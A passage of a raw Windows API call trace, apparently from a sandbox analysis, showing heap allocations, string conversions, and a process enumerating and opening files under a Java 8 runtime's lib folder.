HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0094.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0094.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0094.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0094.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0094.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0094.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0094.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0094.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0094.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0094.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0094.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0094.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0094.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0094.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0094.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0094.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0094.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0094.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0094.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0094.503] AreFileApisANSI () returned 1 [0094.503] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 64 [0094.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e718 [0094.503] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6e718, cchWideChar=64 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\accessibility.properties") returned 64 [0094.503] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\accessibility.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\accessibility.properties"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x95)) returned 1 [0094.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e718 | out: hHeap=0x20000) returned 1 [0094.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0094.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0094.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0094.504] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.504] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.504] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0fe451d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="amd64", cAlternateFileName="")) returned 1 [0094.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0094.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0094.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0094.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0094.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0094.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0094.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0094.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0094.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d790 [0094.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x69bb0 [0094.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d790 | out: hHeap=0x20000) returned 1 [0094.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0094.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0094.504] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.504] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.504] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.504] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0094.504] AreFileApisANSI () returned 1 [0094.504] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\amd64", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\amd64", lpUsedDefaultChar=0x0) returned 45 [0094.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0094.504] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.504] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0094.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0094.505] AreFileApisANSI () returned 1 [0094.505] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0094.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71758 [0094.505] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x71758, cchWideChar=45 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\amd64") returned 45 [0094.505] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\amd64" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\amd64"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0094.505] GetLastError () returned 0x5 [0094.505] GetLastError () returned 0x5 [0094.505] SetLastError (dwErrCode=0x5) [0094.505] GetLastError () returned 0x5 [0094.505] SetLastError (dwErrCode=0x5) [0094.505] GetLastError () returned 0x5 [0094.505] SetLastError (dwErrCode=0x5) [0094.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0094.505] AreFileApisANSI () returned 1 [0094.505] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0094.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71c38 [0094.505] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x71c38, cchWideChar=45 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\amd64") returned 45 [0094.505] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\amd64" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\amd64"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0094.505] GetLastError () returned 0x5 [0094.505] GetLastError () returned 0x5 [0094.505] SetLastError (dwErrCode=0x5) [0094.505] GetLastError () returned 0x5 [0094.505] SetLastError (dwErrCode=0x5) [0094.505] GetLastError () returned 0x5 [0094.506] SetLastError (dwErrCode=0x5) [0094.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71c38 | out: hHeap=0x20000) returned 1 [0094.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0094.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0094.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0094.506] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.506] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.506] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.506] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d268 [0094.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a4b0 [0094.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d268 | out: hHeap=0x20000) returned 1 [0094.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0094.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a4b0 | out: hHeap=0x20000) returned 1 [0094.506] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa105ca28, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="applet", cAlternateFileName="")) returned 1 [0094.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0094.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0094.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0094.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71828 [0094.506] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\amd64\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78310 [0094.506] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0fe451d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0094.506] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x27a, dwReserved0=0x0, dwReserved1=0x0, cFileName="jvm.cfg", cAlternateFileName="")) returned 1 [0094.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71828 | out: hHeap=0x20000) returned 1 [0094.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0094.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46908 [0094.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0094.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0094.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35090 [0094.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0094.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35090 | out: hHeap=0x20000) returned 1 [0094.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0094.507] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0094.507] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0094.507] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0094.507] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0094.507] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a400 [0094.507] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0094.507] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0094.507] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0094.507] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.507] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.507] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.507] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.507] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0094.507] AreFileApisANSI () returned 1 [0094.507] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg", lpUsedDefaultChar=0x0) returned 53 [0094.507] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0094.507] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.507] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.507] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0094.507] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0094.507] AreFileApisANSI () returned 1 [0094.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0094.507] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75cd8 [0094.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x75cd8, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg") returned 53 [0094.507] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0094.508] GetFileType (hFile=0x368) returned 0x1 [0094.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0094.508] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0094.508] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0094.508] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0094.508] CloseHandle (hObject=0x368) returned 1 [0094.508] AreFileApisANSI () returned 1 [0094.508] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0094.508] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x76188 [0094.508] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x76188, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg") returned 53 [0094.508] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0094.509] GetFileType (hFile=0x368) returned 0x1 [0094.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0094.509] CloseHandle (hObject=0x368) returned 1 [0094.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0094.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0094.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0094.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0094.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0094.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0094.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.509] AreFileApisANSI () returned 1 [0094.509] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0094.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75e40 [0094.510] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x75e40, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg") returned 53 [0094.510] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x27a)) returned 1 [0094.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0094.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0094.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0094.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0094.510] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.510] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.510] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x68, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x6a3b8, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x68, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="\\a", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓ɺ")) returned 0 [0094.510] FindClose (in: hFindFile=0x78310 | out: hFindFile=0x78310) returned 1 [0094.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0094.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0094.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0094.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0094.510] HeapFree (in: 